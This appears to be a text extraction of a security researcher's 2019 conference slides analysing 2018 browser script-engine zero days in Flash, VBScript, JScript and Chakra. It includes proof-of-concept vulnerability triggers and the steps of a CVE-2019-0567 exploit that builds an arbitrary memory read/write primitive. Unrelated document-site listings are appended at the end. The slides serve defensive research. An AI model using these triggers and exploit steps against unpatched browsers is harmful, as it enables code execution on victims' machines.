Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim...

Browser Script Engine Zero Days in 2018

Elliot Cao

Trend Micro

2019-05-30

Whoami

• Previous occupation is electrical engineer

• Joined in Trend Micro in 2017

• Sandbox developer

• Started browser vulnerability research in 2018

• Focus on browser script engine

• Lei Cao (@elli0tn0phacker)

Agenda

• Browser Zero Days in 2018

• VBSEmulator

• Chakra

Browser Zero Days in 2018

• Flash: CVE-2018-4878 CVE-2018-15982

• VBScript: CVE-2018-8174 CVE-2018-8373

• JScript: CVE-2018-8653

Flash Zero Days in 2018

• CVE-2018-4878

var psdk:PSDK = PSDK.pSDK;

var psdk_dispatcher:PSDKEventDispatcher = psdk.createDispatcher();

this.mediaPlayer = psdk.createMediaPlayer(psdk_dispatcher);

this.my_DRMListerner = new DRMOperationCompleteListener ();

this.mediaPlayer.drmManager.initialize(this.my_DRMListerner);

this.my_DRMListerner = null;

new LocalConnection().connect("foo");

catch (e:Error) {

my_DRMListerner_vuln = new DRMOperationCompleteListener ();

• CVE-2018-4878

Create an Object

catch (e:Error) {

• CVE-2018-4878

Free the Object

• CVE-2018-4878

Reuse free memory

Trigger GC,

Get a dangling pointer

my_DRMListerner_vuln

catch (e:Error) {

• CVE-2018-15982

var ba:ByteArray = new ByteArray();

var md:Metadata = new Metadata();

var arr_key:* = null;

i = 0;

while (i < 0x100) {

md.setObject(i.toString(), ba);

catch (e:Error){}

arr_key = md.keySet;

• CVE-2018-15982

i = 0;

while (i < 0x100) {

catch (e:Error){}

Create some String object

and save them to Metadata

• CVE-2018-15982

i = 0;

while (i < 0x100) {

catch (e:Error){}

• CVE-2018-15982

i = 0;

while (i < 0x100) {

catch (e:Error){}

Trigger GC

• CVE-2018-15982

i = 0;

while (i < 0x100) {

catch (e:Error){}

arr_key = md.keySet; Get dangling pointers

arr_key

VBScript Zero Days in 2018

• CVE-2018-8174

Dim arr(1)

Class MyClass

Private Sub Class_Terminate

Set o = arr(0)

arr(0) = &h12345678

End Sub

End Class

Set arr(0) = New MyClass

Erase arr

msgbox o

• CVE-2018-8174

Dim arr(1)

Class MyClass

Set o = arr(0)

arr(0) = &h12345678

End Sub

End Class

Erase arr

msgbox o

Create one MyClass object

and save its pointer to arr(0)

• CVE-2018-8174

Dim arr(1)

Class MyClass

Set o = arr(0)

arr(0) = &h12345678

End Sub

End Class

Erase arr

msgbox o

• CVE-2018-8174

Dim arr(1)

Class MyClass

Set o = arr(0)

arr(0) = &h12345678

End Sub

End Class

Erase arr

msgbox o

Save MyClass object

pointer to variable o

• CVE-2018-8174

Dim arr(1)

Class MyClass

Set o = arr(0)

arr(0) = &h12345678

End Sub

End Class

Erase arr

msgbox o Get a dangling pointer

• CVE-2018-8373

Dim arr()

ReDim arr(2)

Class MyClass

Public Default Property Get P

ReDim arr(1)

End Sub

End Class

arr(2) = New MyClass

• CVE-2018-8373

Dim arr()

ReDim arr(2)

Class MyClass

ReDim arr(1)

End Sub

End Class

arr(2) = New MyClass Save the arr(2) address on the stack

• CVE-2018-8373

Dim arr()

ReDim arr(2)

Class MyClass

ReDim arr(1)

End Sub

End Class

• CVE-2018-8373

Dim arr()

ReDim arr(2)

Class MyClass

ReDim arr(1)

End Sub

End Class

Original array buffer

will be freed by |ReDim|

• CVE-2018-8373

Dim arr()

ReDim arr(2)

Class MyClass

ReDim arr(1)

End Sub

End Class

arr(2) = New MyClass Get a dangling pointer

JScript Zero Days in 2018

• CVE-2018-8653

for (var i = 0; i < limit; i++) {

var arr = new Array({prototype:{}});

var e = new Enumerator(arr);

e.moveFirst();

refs[i] = e.item();

refs[i].prototype = {};

refs[i].prototype.isPrototypeOf = getFreeRef;

dummyObj instanceof refs[0];

• CVE-2018-8653

e.moveFirst();

refs[i] = e.item();

Create an array contains object has prototype object

• CVE-2018-8653

e.moveFirst();

refs[i] = e.item();

Set the prototype object isPrototypeOf

to |getFreeRef| callback

• CVE-2018-8653

e.moveFirst();

refs[i] = e.item();

dummyObj instanceof refs[0]; Trigger |getFreeRef| callback

• CVE-2018-8653

function getFreeRef() {

if (count == limit) {

refs[i].prototype = 0;

CollectGarbage();

} else {

dummyObj instanceof refs[count++];

// crash here

return false;

recursive calls to put |this| on the stack

• CVE-2018-8653

CollectGarbage();

} else {

// crash here

return false;

Break out and release prototype object

by garbage collection

• CVE-2018-8653

CollectGarbage();

} else {

// crash here

return false;

|this| pointer is still saved on the stack and not tracked by GC

Get a dangling pointer

VBSEmulator

What is VBScript

• One script language developed by Microsoft

• Not meet ECMAScript standard

• Run in vbscript.dll

• Not open sourced

How does vbscript.dll work

• Load

• Parse

• Compile

• Run

• Unload

• Load

• Parse

• Compile

• Run

• Unload

CScriptRuntime::RunNoEH(CScriptRuntime *__hidden this, struct VAR *)

• Load

• Parse

• Compile

• Run

• Unload

CScriptRuntime::RunNoEH(CScriptRuntime *__hidden this, struct VAR *)

CScriptRuntime

+0x28 Local Variables

+0x2C Function Arguments

+0xB0 Statck Pointer

+0xB4 Position Counter

+0xC0 CompiledScript

CompiledScript

+0x10 func_offset

+0x14 func_count

+0x1C bos_info

+0x28 bos_data

+0x2C bos_data_length

What is VBSEmulator

• One tool can deobfuscate vbs obfuscated sample

• One tool can detect GodMode or ROP

How does VBSEmulator work

Hook LoadLibrary

Init COM

Run Script

Dump Behavior

Detect Exploit

Uninitialize

Break outY

Hook LoadLibrary

Init COM

Run Script

Dump Behavior

Detect Exploit

Uninitialize

Break outY

• Functions hooked are not exported

• Need to maintain one hooked functions entry point pattern

• By hooking LoadLibrary, I can use specialized vbscript.dll

Hook LoadLibrary

Init COM

Run Script

Dump Behavior

Detect Exploit

Uninitialize

Break outY

• Exploit1: GodMode

Hook LoadLibrary

Init COM

Run Script

Dump Behavior

Detect Exploit

Uninitialize

Break outY

• Exploit2: ROP

Hook LoadLibrary

Init COM

Run Script

Dump Behavior

Detect Exploit

Uninitialize

Break outY

• Detect Exploit1: GodMode

(1) Hook COleScript::CanObjectRun

(2) Check if safe mode flag modified

(3) If detect, throw exception and stop running ActiveX

• Detect Exploit2: ROP

(1) Hook ntdll!NtContinue

(2) Check if CONTEXT.Eip ==VirtualProtect

(3) If detect, throw exception and stop running shellcode

Chakra

What is Chakra

• A JavaScript engine developed by Microsoft

• Used in Microsoft Edge

• Forked from Jscript9 Used in Internet Explorer

• Open sourced as ChakraCore in GitHub ☺

How does Chakra work

• Parser

• Interpreter

• JIT compiler

• Garbage Collector

From: https://github.com/Microsoft/ChakraCore/wiki/Architecture-Overview

Basic variable type in Chakra

• Array

• JavascriptArray

• JavascriptNativeIntArray

• JavascriptNativeFloatArray

• Array

• JavascriptArray

segment

• Array

• JavascriptArray

• Array

• JavascriptArray

• Array

• Type Conversion in Array

arr[0] = {};

JavascriptNativeFloatArray

JavascriptArray

• Object

• Memory layout of DynamicObject

var obj2 = {__proto__:obj1};

Chakra JIT Type Confusion

From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=chakra

• Example

function opt(obj) {

foo(obj);

for(let i=0; i < 0x10000; i++) {

opt(obj1);

opt(obj2);

• Example

function opt(obj) {

foo(obj);

for(let i=0; i < 0x10000; i++) {

opt(obj1);

opt(obj2);

Force opt() to be JITed and optimized

• Example

function opt(obj) {

foo(obj);

for(let i=0; i < 0x10000; i++) {

opt(obj1);

opt(obj2);

JITed opt() makes assumption on obj type

and bailout if type check fail

• Example

function opt(obj) {

foo(obj);

for(let i=0; i < 0x10000; i++) {

opt(obj1);

opt(obj2);

foo() has side effect may change obj type

• Example

function opt(obj) {

foo(obj);

for(let i=0; i < 0x10000; i++) {

opt(obj1);

opt(obj2); Call opt() JITed code directly,

and if JITed code not check obj2 type if changed by foo(),

Type Confusion happened!

• Case Study: CVE-2017-11802

let arr = [1.1, 1.2];

function opt(f) {

arr[0] = 1.1;

arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));

return 1;

for (var i = 0; i < 0x10000; i++)

opt(()=>{return '0';});

opt(()=>{ arr[0]={}; return '0';});

//trigger exception

arr[1].toString();

From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802

• Case Study: CVE-2017-11802 : Root Cause

let arr = [1.1, 1.2];

function opt(f) {

arr[0] = 1.1;

return 1;

for (var i = 0; i < 0x10000; i++)

opt(()=>{return '0';});

opt(()=>{ arr[0]={}; return '0';});

//trigger exception

arr[1].toString();

Define one JavascriptFloatArray

let arr = [1.1, 1.2];

function opt(f) {

arr[0] = 1.1;

return 1;

for (var i = 0; i < 0x10000; i++)

opt(()=>{return '0';});

opt(()=>{ arr[0]={}; return '0';});

//trigger exception

arr[1].toString();

for loop force opt() to be JITed and optimized

let arr = [1.1, 1.2];

function opt(f) {

arr[0] = 1.1;

return 1;

for (var i = 0; i < 0x10000; i++)

opt(()=>{return '0';});

opt(()=>{ arr[0]={}; return '0';});

//trigger exception

arr[1].toString();

|replace| will trigger ImplicitCall callback

let arr = [1.1, 1.2];

function opt(f) {

arr[0] = 1.1;

return 1;

for (var i = 0; i < 0x10000; i++)

opt(()=>{return '0';});

opt(()=>{ arr[0]={}; return '0';});

//trigger exception

arr[1].toString();

Call opt() JITed code directly

let arr = [1.1, 1.2];

function opt(f) {

arr[0] = 1.1;

return 1;

for (var i = 0; i < 0x10000; i++)

opt(()=>{return '0';});

opt(()=>{ arr[0]={}; return '0';});

//trigger exception

arr[1].toString();

|replace| will trigger ImplicitCall callback

| arr[0]={}| will change the Array type from

JavascriptNativeFloatArray to JavascriptArray

let arr = [1.1, 1.2];

function opt(f) {

arr[0] = 1.1;

return 1;

for (var i = 0; i < 0x10000; i++)

opt(()=>{return '0';});

opt(()=>{ arr[0]={}; return '0';});

//trigger exception

arr[1].toString();

JITed opt() still assumes arr type is JavascriptNativeFloatArray.

Type confusion happened!

opt JITed Code

let arr = [1.1, 1.2];

function opt(f) {

arr[0] = 1.1;

return 1;

for (var i = 0; i < 0x10000; i++)

opt(()=>{return '0';});

opt(()=>{ arr[0]={}; return '0';});

//trigger exception

arr[1].toString();

• Case Study: CVE-2017-11802 : Patch

• Case Study: CVE-2019-0567

function opt(obj1, obj2) {

obj1.b = 1;

let tmp = {__proto__:obj2};

obj1.a = 0x1234;

obj1 = {a:1, b:2 };

obj2 = {};

for(let i=0; i<0x10000; i++)

opt(obj1, obj2);

opt(obj1, obj1);

//trigger exception

obj1.a.toString();

obj1.b = 1;

obj1.a = 0x1234;

obj1 = {a:1, b:2 };

obj2 = {};

for(let i=0; i<0x10000; i++)

opt(obj1, obj2);

opt(obj1, obj1);

//trigger exception

obj1.a.toString();

Create two objects

obj1.b = 1;

obj1.a = 0x1234;

obj1 = {a:1, b:2 };

obj2 = {};

for(let i=0; i<0x10000; i++)

opt(obj1, obj2);

opt(obj1, obj1);

//trigger exception

obj1.a.toString();

for loop force opt() to be JITed and optimized

obj1.b = 1;

obj1.a = 0x1234;

obj1 = {a:1, b:2 };

obj2 = {};

for(let i=0; i<0x10000; i++)

opt(obj1, obj2);

opt(obj1, obj1);

//trigger exception

obj1.a.toString();

|{__proto__:obj2}| make obj2 to be the prototype of

some object

obj1.b = 1;

obj1.a = 0x1234;

obj1 = {a:1, b:2 };

obj2 = {};

for(let i=0; i<0x10000; i++)

opt(obj1, obj2);

opt(obj1, obj1);

//trigger exception

obj1.a.toString();

Call opt() JITed code directly

obj1.b = 1;

obj1.a = 0x1234;

obj1 = {a:1, b:2 };

obj2 = {};

for(let i=0; i<0x10000; i++)

opt(obj1, obj2);

opt(obj1, obj1);

//trigger exception

obj1.a.toString();

some object

obj1.b = 1;

obj1.a = 0x1234;

obj1 = {a:1, b:2 };

obj2 = {};

for(let i=0; i<0x10000; i++)

opt(obj1, obj2);

opt(obj1, obj1);

//trigger exception

obj1.a.toString();

some object

obj1.b = 1;

obj1.a = 0x1234;

obj1 = {a:1, b:2 };

obj2 = {};

for(let i=0; i<0x10000; i++)

opt(obj1, obj2);

opt(obj1, obj1);

//trigger exception

obj1.a.toString();

JITed opt() does not know the change.

obj1.b = 1;

obj1.a = 0x1234;

obj1 = {a:1, b:2 };

obj2 = {};

for(let i=0; i<0x10000; i++)

opt(obj1, obj2);

opt(obj1, obj1);

//trigger exception

obj1.a.toString();

JITed opt() does not know the change of obj1 memory laylout.

obj1.b = 1;

obj1.a = 0x1234;

obj1 = {a:1, b:2 };

obj2 = {};

for(let i=0; i<0x10000; i++)

opt(obj1, obj2);

opt(obj1, obj1);

//trigger exception

obj1.a.toString();

• Before patch: lowerer

• After patch: lowerer

• Case Study: CVE-2019-0567 : Exploit

• auxslots can be controlled by script

• goal is to get R/W primitive

• need to corrupt some object to exploit

• DateView

var buffer = new ArrayBuffer(0x123);

var dv = new DataView(buffer);

dv.setUint32(0, 0x12345678, true);

• Exploit Memory Layout – R/W Primitive

vtable

auxslots

vtable

auxslots

vtable

auxslots

objectArrayobjectArray objectArray

length

arrayBuffer

byteOffset

buffer

vtable

auxslots

objectArray

length

arrayBuffer

byteOffset

buffer

obj1 (DynamicObject) obj3 (DynamicObject) dv1 (DataView) dv2 (DataView)

obj1.a

obj1.b

obj1.c

obj3.a

obj3.b

obj3.c

obj3.d

obj3.e

obj3.f

obj3.g

obj3.h

vtable

auxslots

vtable

auxslots

vtable

auxslots

length

arrayBuffer

byteOffset

buffer

vtable

auxslots

objectArray

length

arrayBuffer

byteOffset

buffer

obj1.a

obj1.b

obj1.c

obj3.a

obj3.b

obj3.c

obj3.d

obj3.e

obj3.f

obj3.g

obj3.h

Step1. Trigger bug and set obj1->auxSlots = obj3

opt(obj1, obj1, obj3);

vtable

auxslots

vtable

auxslots

vtable

auxslots

length

arrayBuffer

byteOffset

buffer

vtable

auxslots

objectArray

length

arrayBuffer

byteOffset

buffer

obj1.a

obj1.b

obj1.c

obj3.a

obj3.b

obj3.c

obj3.d

obj3.e

obj3.f

obj3.g

obj3.h

Step2. Set obj3->auxSlots = dv1

obj1.c = dv1;

vtable

auxslots

vtable

auxslots

vtable

auxslots

length

arrayBuffer

byteOffset

buffer

vtable

auxslots

objectArray

length

arrayBuffer

byteOffset

buffer

obj1.a

obj1.b

obj1.c

obj3.a

obj3.b

obj3.c

obj3.d

obj3.e

obj3.f

obj3.g

obj3.h

Step3. Set dv1->buffer = dv2

obj3.h = dv2;

vtable

auxslots

vtable

auxslots

vtable

auxslots

length

arrayBuffer

byteOffset

buffer

vtable

auxslots

objectArray

length

arrayBuffer

byteOffset

buffer

obj1.a

obj1.b

obj1.c

obj3.a

obj3.b

obj3.c

obj3.d

obj3.e

obj3.f

obj3.g

obj3.h

Step4. Get arbitrary R/W primitive

by corrupting dv2's buffer

dv1.setUint32(0x38, addr_lo, true);

dv1.setUint32(0x3c, addr_hi, true)

• Leak chakra base address

Conclusion

• Flash is still the main target of attackers. As Adobe will stop updating Flash at the end of 2020, the number of Flash zero days attacks maybe decrease.

• In 2018, some old script engines began to be the target of attackers, such as VBScript and JScript. Maybe more zero days attacks will be discovered in these script engines in the future.

• VBSEmulator is one tool can use to do some vbscript deobfuscation and detect possible unknown exploit.

• The new JavaScript engine Chakra seems vulnerable, especially JIT compiler. Type confusion is easy to exploit.

Thank You!

Browser Script Engine Zero Days in 2018

@elli0tn0phacker

Elliot Cao

elliot_cao@trendmicro.com

Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim...

Documents

Transcript of Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim...

Ecopack Dim

Zero to $1M ARR: How to Grow a SaaS Company

Calculo DIM

Sales Dim Date Dim Customers Dim Products Dim Categories Dim Geography The data warehouse is a simple and standard one, after all we.

CHAMBER ORCHESTRA OF THE SPRINGS...EBAss 89 dim , dim. sempre dim. sempre dim. - izza pizzç izrz„ arco izz. divisi PP ten cresc. div. poco cresce poco cresc- ten dim. dim dolce

cold rolled products technical manual - Hi-Span · 70 32 Dim X 70 Dim X3 2 Dim b Dim r Dim c Purlin Overhang C of RaftersL Purlin Length3 3 10mm Clearance 70 32 XD Dim 70 im X 32

information Display-Modul DIM 611-0 - siedle.de · Display-Modul DIM 611-0 Display module DIM 611-0 Module d´affichage DIM 611-0 Modulo display DIM 611-0 Displaymodule DIM 611-0

Countdown To Christmas Countdow… · Cue - House lights dim. Track 1 Countdown To Christmas (Company) Mike Smith & Wilf Tudor arr. Leo Nicholson?bb. . . &b b ALL &b b... ..? bb.

Slowlychange Dim

Dim Arrow Size Offset from dim line Frame around text Precision = Dim line 200 o Suffi Liner Dim Arrow Heads 5 Extension Line Radius Dim Center mark Dim Extend beyond dim lines 4 Offset

Dim Patterns

sede5c0112079ea78.jimcontent.com · Samba Orfeo Arr. Helmut Bräuer Arr. Norbert Studnitzky Arr. Siegfried Rundel Arr. Freek Mestrini Arr. Franz David Neue Musikantinnen und Musikanten

...Für Elise Bagatelle in A minor BEETHOVEN (1770-1827) Op.173 Poco moto Violin Piano 22 dim. 29 dim. mp mp dim. dim. cresc cresc 100 cresc 105 110 116 dim. dim. 121 poco rit. poco

€¦ · PORGY AND - Selection - I. Summertime Allegretto semplice (J = 76) BESS George Gershwin arr. Jan van der Goot morendo .TPìe mfespr. // molto legato dim. asr nar 2. Oh, I

Dim Reduction

Challans WE 2017-2018 M… · Sam 14 oct Dim 15 oct Sam 14 oct Dim 15 oct Sam 14 oct Dim 15 oct Sam 14 oct Dim 15 oct Sam 14 oct Dim 15 oct Sam 14 oct Dim 15 oct Sam 7 oct Dim 8 oct

sarahwallinhuff.com23 cresc. dim. dim. cresc. 65 dim. *Optional cut to measure 74 (omit measures 69-73) 70 mp arco 75 cresc. dim. 80 • cresc. 85 EL03455

Duet Book · 2020. 9. 15. · Allegretto q = 84 20. Chanson De Matin Edward Elgar Op 15 No 2 Arr John Harvey A Violin Viola as Bassmf dim p dolcemf dim p 9 poco cresc pp poco cresc

From ZERO to ONE million $$ ARR in SaaS sales: QuickBlox experience

Cunningham CV (8.1.15).FINAL - Oakland University...Aug 01, 2015 · Anderson Anderson Berlin/Ringwald Williams, J. arr. Wendel arr. Hayen arr. Goldstein arr. Rutter arr. Rutter arr.